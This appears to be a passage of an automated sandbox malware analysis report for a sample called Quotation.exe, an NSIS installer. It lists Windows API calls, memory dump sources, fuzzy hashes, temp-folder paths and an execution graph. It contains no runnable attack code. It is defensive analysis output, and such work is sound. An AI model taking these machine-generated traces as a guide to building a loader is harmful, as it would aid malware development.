                                                              • GlobalFree.KERNEL32(00000000), ref: 73422778
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2432204448.0000000073421000.00000020.00000001.01000000.00000005.sdmp, Offset: 73420000, based on PE: true
                                                              • Associated: 00000000.00000002.2432044113.0000000073420000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                              • Associated: 00000000.00000002.2432399195.0000000073424000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                              • Associated: 00000000.00000002.2432790406.0000000073426000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_73420000_Quotation.jbxd
                                                              Similarity
                                                              • API ID: Global$Free$Alloc
                                                              • String ID:
                                                              • API String ID: 1780285237-0
                                                              • Opcode ID: fa937e9819816fbe33cea23674f3c14f94a6dda59f9cbcc8da2b80631423866f
                                                              • Instruction ID: 2ecd288734694744ff0c76119cb14e06793f773dfe51d1e491d42f92caea0c6b
                                                              • Opcode Fuzzy Hash: fa937e9819816fbe33cea23674f3c14f94a6dda59f9cbcc8da2b80631423866f
                                                              • Instruction Fuzzy Hash: CD31BC72108909DFD75EAF55CC84F2ABBBAEB95306724416DF105B3261C73058458B69
                                                              APIs
                                                              • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 004029B6
                                                              • GlobalAlloc.KERNEL32(00000040,?,00000000,?), ref: 004029D2
                                                              • GlobalFree.KERNEL32(?), ref: 00402A0B
                                                              • GlobalFree.KERNEL32(00000000), ref: 00402A1E
                                                              • CloseHandle.KERNEL32(?,?,?,?,?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 00402A3A
                                                              • DeleteFileW.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 00402A4D
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2393908135.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2393893435.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2393921503.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2393936631.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2393936631.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2393936631.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2393936631.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2393936631.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2393936631.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2394039644.000000000044E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_Quotation.jbxd
                                                              Similarity
                                                              • API ID: Global$AllocFree$CloseDeleteFileHandle
                                                              • String ID:
                                                              • API String ID: 2667972263-0
                                                              • Opcode ID: b07bb42a36a53ac2b652948ec131e563e6f6be8de0f89c4bf93d81cf64cebf1f
                                                              • Instruction ID: 66908bbe9354c3b59104e874c770ae4161d9466efedc1f742b63756e9967f80f
                                                              • Opcode Fuzzy Hash: b07bb42a36a53ac2b652948ec131e563e6f6be8de0f89c4bf93d81cf64cebf1f
                                                              • Instruction Fuzzy Hash: 54319E71900128ABCF21AFA5CE49D9E7E79AF44364F10423AF514762E1CB794C429FA8
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2432204448.0000000073421000.00000020.00000001.01000000.00000005.sdmp, Offset: 73420000, based on PE: true
                                                              • Associated: 00000000.00000002.2432044113.0000000073420000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                              • Associated: 00000000.00000002.2432399195.0000000073424000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                              • Associated: 00000000.00000002.2432790406.0000000073426000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_73420000_Quotation.jbxd
                                                              Similarity
                                                              • API ID: FreeGlobal
                                                              • String ID:
                                                              • API String ID: 2979337801-0
                                                              • Opcode ID: e7fc705cff2720f18d496075e5c20ef9d486cde3b18ae5f8b7c50b4c0986e98b
                                                              • Instruction ID: 8b233226daaf65189b016caee4a2dd33203bba88a6c302b517513eb3b89781e0
                                                              • Opcode Fuzzy Hash: e7fc705cff2720f18d496075e5c20ef9d486cde3b18ae5f8b7c50b4c0986e98b
                                                              • Instruction Fuzzy Hash: B351B332D00118ABDB0E9FA48C4479EBEBAEB44397F054159F407B3394E671A946C79D
                                                              APIs
                                                              • GlobalFree.KERNEL32(00000000), ref: 734225C2
                                                                • Part of subcall function 734212CC: lstrcpynW.KERNEL32(00000000,?,7342137F,00000019,734211CA,-000000A0), ref: 734212DC
                                                              • GlobalAlloc.KERNEL32(00000040), ref: 73422548
                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,?,00000000,00000000), ref: 73422563
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2432204448.0000000073421000.00000020.00000001.01000000.00000005.sdmp, Offset: 73420000, based on PE: true
                                                              • Associated: 00000000.00000002.2432044113.0000000073420000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                              • Associated: 00000000.00000002.2432399195.0000000073424000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                              • Associated: 00000000.00000002.2432790406.0000000073426000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_73420000_Quotation.jbxd
                                                              Similarity
                                                              • API ID: Global$AllocByteCharFreeMultiWidelstrcpyn
                                                              • String ID:
                                                              • API String ID: 4216380887-0
                                                              • Opcode ID: 26a40b2bc26bed0242643d6baf6beab64704da029fcf7581aa83a73469c0e94b
                                                              • Instruction ID: b010e727c107da2bc2c359f59072fbfc4de464bba44e61bc446ea9daa60c1089
                                                              • Opcode Fuzzy Hash: 26a40b2bc26bed0242643d6baf6beab64704da029fcf7581aa83a73469c0e94b
                                                              • Instruction Fuzzy Hash: 8041ACB1008309EFE79CEF259840B267BF8FF64312F10891DE45AB6291E770A585CB69
                                                              APIs
                                                              • GetDlgItem.USER32(?,?), ref: 00401D9F
                                                              • GetClientRect.USER32(?,?), ref: 00401DEA
                                                              • LoadImageW.USER32(?,?,?,?,?,?), ref: 00401E1A
                                                              • SendMessageW.USER32(?,00000172,?,00000000), ref: 00401E2E
                                                              • DeleteObject.GDI32(00000000), ref: 00401E3E
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2393908135.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2393893435.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2393921503.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2393936631.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2393936631.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2393936631.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2393936631.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2393936631.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2393936631.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2394039644.000000000044E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_Quotation.jbxd
                                                              Similarity
                                                              • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                              • String ID:
                                                              • API String ID: 1849352358-0
                                                              • Opcode ID: b4553b6f8f96a3615d4cb1d74016621c3cb3daa09826911c1e5c071ec9b0e61c
                                                              • Instruction ID: 002387d4b88dbb62f40c54eb0dee3f9a721ef30fc2dbb8ae50818b7fec09efb0
                                                              • Opcode Fuzzy Hash: b4553b6f8f96a3615d4cb1d74016621c3cb3daa09826911c1e5c071ec9b0e61c
                                                              • Instruction Fuzzy Hash: 0F21F872A00119AFCB15DF98DE45AEEBBB5EB08304F14003AF945F62A0D7789D41DB98
                                                              APIs
                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,00000808,00000000,?,00000000,734222D8,?,00000808), ref: 734216D5
                                                              • GlobalAlloc.KERNEL32(00000040,00000000,?,00000000,734222D8,?,00000808), ref: 734216DC
                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,?,00000000,734222D8,?,00000808), ref: 734216F0
                                                              • GetProcAddress.KERNEL32(734222D8,00000000), ref: 734216F7
                                                              • GlobalFree.KERNEL32(00000000), ref: 73421700
Memory Dump Source
• Source File: 00000000.00000002.2432204448.0000000073421000.00000020.00000001.01000000.00000005.sdmp, Offset: 73420000, based on PE: true
• Associated: 00000000.00000002.2432044113.0000000073420000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000000.00000002.2432399195.0000000073424000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000000.00000002.2432790406.0000000073426000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_73420000_Quotation.jbxd
Similarity
• API ID: ByteCharGlobalMultiWide$AddressAllocFreeProc
• String ID:
• API String ID: 1148316912-0
APIs
• lstrlenW.KERNEL32(00422F08,00422F08,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404DEE
• wsprintfW.USER32 ref: 00404DF7
• SetDlgItemTextW.USER32(?,00422F08), ref: 00404E0A
Memory Dump Source
• Source File: 00000000.00000002.2393908135.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2393893435.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2393921503.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2393936631.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2393936631.0000000000425000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2393936631.0000000000427000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2393936631.000000000042C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2393936631.000000000042E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2393936631.0000000000434000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2394039644.000000000044E000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Quotation.jbxd
Similarity
• API ID: ItemTextlstrlenwsprintf
• String ID: %u.%u%s%s
• API String ID: 3540041739-3551169577
APIs
  • Part of subcall function 00406521: lstrcpynW.KERNEL32(?,?,00000400,0040366E,00428A20,NSIS Error,?,00000008,0000000A,0000000C), ref: 0040652E
  • Part of subcall function 00405E9B: CharNextW.USER32(?,?,C:\Users\user\AppData\Local\Temp\nsd350B.tmp,?,00405F0F,C:\Users\user\AppData\Local\Temp\nsd350B.tmp,C:\Users\user\AppData\Local\Temp\nsd350B.tmp,75923420,?,C:\Users\user\AppData\Local\Temp\,00405C4D,?,75923420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\Quotation.exe"), ref: 00405EA9
  • Part of subcall function 00405E9B: CharNextW.USER32(00000000), ref: 00405EAE
  • Part of subcall function 00405E9B: CharNextW.USER32(00000000), ref: 00405EC6
• lstrlenW.KERNEL32(C:\Users\user\AppData\Local\Temp\nsd350B.tmp,00000000,C:\Users\user\AppData\Local\Temp\nsd350B.tmp,C:\Users\user\AppData\Local\Temp\nsd350B.tmp,75923420,?,C:\Users\user\AppData\Local\Temp\,00405C4D,?,75923420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\Quotation.exe"), ref: 00405F51
• GetFileAttributesW.KERNEL32(C:\Users\user\AppData\Local\Temp\nsd350B.tmp,C:\Users\user\AppData\Local\Temp\nsd350B.tmp,C:\Users\user\AppData\Local\Temp\nsd350B.tmp,C:\Users\user\AppData\Local\Temp\nsd350B.tmp,C:\Users\user\AppData\Local\Temp\nsd350B.tmp,C:\Users\user\AppData\Local\Temp\nsd350B.tmp,00000000,C:\Users\user\AppData\Local\Temp\nsd350B.tmp,C:\Users\user\AppData\Local\Temp\nsd350B.tmp,75923420,?,C:\Users\user\AppData\Local\Temp\,00405C4D,?,75923420,C:\Users\user\AppData\Local\Temp\), ref: 00405F61
Memory Dump Source
• Source File: 00000000.00000002.2393908135.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Quotation.jbxd
Similarity
• API ID: CharNext$AttributesFilelstrcpynlstrlen
• String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\nsd350B.tmp
• API String ID: 3248276644-3438590690
APIs
• CharNextW.USER32(?,?,C:\Users\user\AppData\Local\Temp\nsd350B.tmp,?,00405F0F,C:\Users\user\AppData\Local\Temp\nsd350B.tmp,C:\Users\user\AppData\Local\Temp\nsd350B.tmp,75923420,?,C:\Users\user\AppData\Local\Temp\,00405C4D,?,75923420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\Quotation.exe"), ref: 00405EA9
• CharNextW.USER32(00000000), ref: 00405EAE
• CharNextW.USER32(00000000), ref: 00405EC6
Strings
• C:\Users\user\AppData\Local\Temp\nsd350B.tmp, xrefs: 00405E9C
Memory Dump Source
• Source File: 00000000.00000002.2393908135.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Quotation.jbxd
Similarity
• API ID: CharNext
• String ID: C:\Users\user\AppData\Local\Temp\nsd350B.tmp
• API String ID: 3213498283-3684517792
APIs
• lstrlenW.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,004034E9,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004037E6,?,00000008,0000000A,0000000C), ref: 00405DF6
• CharPrevW.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,004034E9,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004037E6,?,00000008,0000000A,0000000C), ref: 00405E00
• lstrcatW.KERNEL32(?,0040A014,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00405E12
Strings
• C:\Users\user\AppData\Local\Temp\, xrefs: 00405DF0
Memory Dump Source
• Source File: 00000000.00000002.2393908135.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Quotation.jbxd
Similarity
• API ID: CharPrevlstrcatlstrlen
• String ID: C:\Users\user\AppData\Local\Temp\
• API String ID: 2659869361-823278215
APIs
• GlobalAlloc.KERNEL32(00000040,?), ref: 73421171
• GlobalAlloc.KERNEL32(00000040,?), ref: 734211E3
• GlobalFree.KERNEL32 ref: 7342124A
• GlobalFree.KERNEL32(?), ref: 7342129B
• GlobalFree.KERNEL32(00000000), ref: 734212B1
Memory Dump Source
• Source File: 00000000.00000002.2432204448.0000000073421000.00000020.00000001.01000000.00000005.sdmp, Offset: 73420000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_73420000_Quotation.jbxd
Similarity
• API ID: Global$Free$Alloc
• String ID:
• API String ID: 1780285237-0
APIs
• lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\nsd350B.tmp\System.dll), ref: 0040269A
Memory Dump Source
• Source File: 00000000.00000002.2393908135.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Quotation.jbxd
Similarity
• API ID: lstrlen
• String ID: C:\Users\user\AppData\Local\Temp\nsd350B.tmp$C:\Users\user\AppData\Local\Temp\nsd350B.tmp\System.dll
• API String ID: 1659193697-3527613287
APIs
• DestroyWindow.USER32(00000000,00000000,004031FC,?), ref: 00403031
• GetTickCount.KERNEL32 ref: 0040304F
• CreateDialogParamW.USER32(0000006F,00000000,00402F98,00000000), ref: 0040306C
• ShowWindow.USER32(00000000,00000005), ref: 0040307A
Memory Dump Source
• Source File: 00000000.00000002.2393908135.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Quotation.jbxd
Similarity
• API ID: Window$CountCreateDestroyDialogParamShowTick
• String ID:
• API String ID: 2102729457-0
APIs
• IsWindowVisible.USER32(?), ref: 00405549
• CallWindowProcW.USER32(?,?,?,?), ref: 0040559A
  • Part of subcall function 004044EC: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 004044FE
Memory Dump Source
• Source File: 00000000.00000002.2393908135.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Quotation.jbxd
Similarity
• API ID: Window$CallMessageProcSendVisible
• String ID:
• API String ID: 3748168415-3916222277
APIs
• FreeLibrary.KERNEL32(?,75923420,00000000,C:\Users\user\AppData\Local\Temp\,00403B36,00403A4C,?,?,00000008,0000000A,0000000C), ref: 00403B78
• GlobalFree.KERNEL32(005C1A88), ref: 00403B7F
Strings
• C:\Users\user\AppData\Local\Temp\, xrefs: 00403B5E
Memory Dump Source
• Source File: 00000000.00000002.2393908135.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2393893435.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2393921503.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2393936631.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2393936631.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2393936631.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2393936631.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2393936631.000000000042E000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2393936631.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2394039644.000000000044E000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_Quotation.jbxd
                                                              Similarity
                                                              • API ID: Free$GlobalLibrary
                                                              • String ID: C:\Users\user\AppData\Local\Temp\
                                                              • API String ID: 1100898210-823278215
                                                              • Opcode ID: 628ac1cb43285a1a84ac4c7f875ed8910a03c7a164280e3efa8a6a131abbe062
                                                              • Instruction ID: 6899552f53244e150386b1952d758f3f927a5bb415edc3c38dc9ad64461d36a3
                                                              • Opcode Fuzzy Hash: 628ac1cb43285a1a84ac4c7f875ed8910a03c7a164280e3efa8a6a131abbe062
                                                              • Instruction Fuzzy Hash: 59E08C3250102057CA211F05ED04B1AB7B8AF45B27F06452AE8407B26287B42C838FD8
                                                              APIs
                                                              • lstrlenW.KERNEL32(80000000,C:\Users\user\Desktop,004030EE,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\Quotation.exe,C:\Users\user\Desktop\Quotation.exe,80000000,00000003), ref: 00405E42
                                                              • CharPrevW.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,004030EE,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\Quotation.exe,C:\Users\user\Desktop\Quotation.exe,80000000,00000003), ref: 00405E52
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2393908135.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_Quotation.jbxd
                                                              Similarity
                                                              • API ID: CharPrevlstrlen
                                                              • String ID: C:\Users\user\Desktop
                                                              • API String ID: 2709904686-1246513382
                                                              • Opcode ID: 4d9a109f9f2e29ac56c0736ccbd4fa6bf3a04a93e1f4050107f2eb61dc35f761
                                                              • Instruction ID: eba18341e72c17137544591cfc51a7e4cac6184970473274e9d14fc4341c5a90
                                                              • Opcode Fuzzy Hash: 4d9a109f9f2e29ac56c0736ccbd4fa6bf3a04a93e1f4050107f2eb61dc35f761
                                                              • Instruction Fuzzy Hash: 29D0A7F3400A30DAC3127708EC00D9F77ACEF16700746443AE580A7165D7785D818AEC
                                                              APIs
                                                              • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,0040625B,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405F86
                                                              • lstrcmpiA.KERNEL32(00000000,00000000), ref: 00405F9E
                                                              • CharNextA.USER32(00000000,?,00000000,0040625B,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FAF
                                                              • lstrlenA.KERNEL32(00000000,?,00000000,0040625B,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FB8
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2393908135.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_Quotation.jbxd
                                                              Similarity
                                                              • API ID: lstrlen$CharNextlstrcmpi
                                                              • String ID:
                                                              • API String ID: 190613189-0
                                                              • Opcode ID: 2e04212541fd7d2d0fc4f715182178ccf0de62a07a1c27cf83518a5c6c9cf375
                                                              • Instruction ID: baa81b9806bcf2d0018ef5e19b9a589e3df5f1c452cb3fab7a363fd504aebd5e
                                                              • Opcode Fuzzy Hash: 2e04212541fd7d2d0fc4f715182178ccf0de62a07a1c27cf83518a5c6c9cf375
                                                              • Instruction Fuzzy Hash: 87F0C231105914EFCB029BA5CE00D9EBFA8EF15254B2100BAE840F7250D638DE019BA8

                                                              Execution Graph

                                                              Execution Coverage: 0.1%
                                                              Dynamic/Decrypted Code Coverage: 100%
                                                              Signature Coverage: 31.8%
                                                              Total number of Nodes: 22
                                                              Total number of Limit Nodes: 2
                                                              execution_graph 53133 33ef8785 53154 33e92bf0 LdrInitializeThunk 53133->53154 53135 33ef87cd 53138 33ef885f 53135->53138 53155 33e90634 LdrInitializeThunk 53135->53155 53137 33ef887f 53140 33ef888a 53137->53140 53162 33f102f4 LdrInitializeThunk 53137->53162 53138->53137 53156 33e92c70 LdrInitializeThunk 53138->53156 53142 33ef87fb 53153 33ef8844 53142->53153 53157 33f1024e LdrInitializeThunk 53142->53157 53145 33ef889e 53145->53153 53158 33e92fb0 LdrInitializeThunk 53145->53158 53147 33ef88b0 53148 33ef88cf 53147->53148 53147->53153 53163 33f102f4 LdrInitializeThunk 53147->53163 53159 33e92b60 LdrInitializeThunk 53148->53159 53151 33ef88d7 53160 33e92e80 LdrInitializeThunk 53151->53160 53153->53138 53161 33e92b60 LdrInitializeThunk 53153->53161 53154->53135 53155->53142 53156->53137 53157->53145 53158->53147 53159->53151 53160->53153 53161->53138 53162->53140 53163->53148 53167 33e92ad0 LdrInitializeThunk

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 2 33e92bf0-33e92bfc LdrInitializeThunk
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2614754852.0000000033E20000.00000040.00001000.00020000.00000000.sdmp, Offset: 33E20000, based on PE: true
                                                              • Associated: 00000003.00000002.2614754852.0000000033F49000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000003.00000002.2614754852.0000000033F4D000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000003.00000002.2614754852.0000000033FBE000.00000040.00001000.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_33e20000_Quotation.jbxd
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID:
                                                              • API String ID: 2994545307-0
                                                              • Opcode ID: 503af94f988c604fbf144eca75a7c711d1a64ce82860062ac8a11ff3adcc8869
                                                              • Instruction ID: fdaa7cde21890d8e92902cd47bf4f96a1f5af859321095232ac19bfc2d0d80b8
                                                              • Opcode Fuzzy Hash: 503af94f988c604fbf144eca75a7c711d1a64ce82860062ac8a11ff3adcc8869
                                                              • Instruction Fuzzy Hash: B6900271B0140C02D1C0719C440564A080557D1302F95C016A0025A14DCA158B5D77A1

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 1 33e92b60-33e92b6c LdrInitializeThunk
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2614754852.0000000033E20000.00000040.00001000.00020000.00000000.sdmp, Offset: 33E20000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_33e20000_Quotation.jbxd
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID:
                                                              • API String ID: 2994545307-0
                                                              • Opcode ID: c658b8c3b85d79891460c1badd3e7ba31c977405a0381d62c6a381c27aeb01d2
                                                              • Instruction ID: 72d16e5c9dd20928915275d5442a8d195d7028aa320a1ff35d48165beb6f2279
                                                              • Opcode Fuzzy Hash: c658b8c3b85d79891460c1badd3e7ba31c977405a0381d62c6a381c27aeb01d2
                                                              • Instruction Fuzzy Hash: DD9002B1B02404034145719C4415616480A57E0202B55C022E1014950DC52589956125

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 0 33e92ad0-33e92adc LdrInitializeThunk
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2614754852.0000000033E20000.00000040.00001000.00020000.00000000.sdmp, Offset: 33E20000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_33e20000_Quotation.jbxd
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID:
                                                              • API String ID: 2994545307-0
                                                              • Opcode ID: 809dde2186e7b7780f40f5e9841a3efd613e69f44576c8223ccf5e507214d508
                                                              • Instruction ID: 8e1a2b056a4f715cb22b7b16fedc4d4e3041c3f4ef59a55efbf43bfa8a2f51cb
                                                              • Opcode Fuzzy Hash: 809dde2186e7b7780f40f5e9841a3efd613e69f44576c8223ccf5e507214d508
                                                              • Instruction Fuzzy Hash: 74900475F11404030145F5DC07055070C4757D5353355C033F1015D10CD731CD755131

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 14 33e92fe0-33e92fec LdrInitializeThunk
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2614754852.0000000033E20000.00000040.00001000.00020000.00000000.sdmp, Offset: 33E20000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_33e20000_Quotation.jbxd
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID:
                                                              • API String ID: 2994545307-0
                                                              • Opcode ID: db8360bd051c52af4911011243df5ce8cd95cdec8075d58ed41f22d9106211f4
                                                              • Instruction ID: 8a59d90ddc05225e4a2f77a572126cf26cbdc15043f6ae9bdc5211fc5dc2dae0
                                                              • Opcode Fuzzy Hash: db8360bd051c52af4911011243df5ce8cd95cdec8075d58ed41f22d9106211f4
                                                              • Instruction Fuzzy Hash: FD900271B11C0442D24075AC4C15B07080557D0303F55C116A0154914CC91589655521

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 13 33e92fb0-33e92fbc LdrInitializeThunk
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2614754852.0000000033E20000.00000040.00001000.00020000.00000000.sdmp, Offset: 33E20000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_33e20000_Quotation.jbxd
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID:
                                                              • API String ID: 2994545307-0
                                                              • Opcode ID: 13aa1fb3707b7bacf14ef9baf3ca28626eded41b2cbc342c8a1b8226d1ff04ae
                                                              • Instruction ID: 8c3f1b0e6dc739ca793be0f558eeacca5634eb8e05d54448764336a60bff8782
                                                              • Opcode Fuzzy Hash: 13aa1fb3707b7bacf14ef9baf3ca28626eded41b2cbc342c8a1b8226d1ff04ae
                                                              • Instruction Fuzzy Hash: 0D900271F0140442418071AC884590648057BE1212755C122A0998910D855989695665

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 12 33e92f90-33e92f9c LdrInitializeThunk
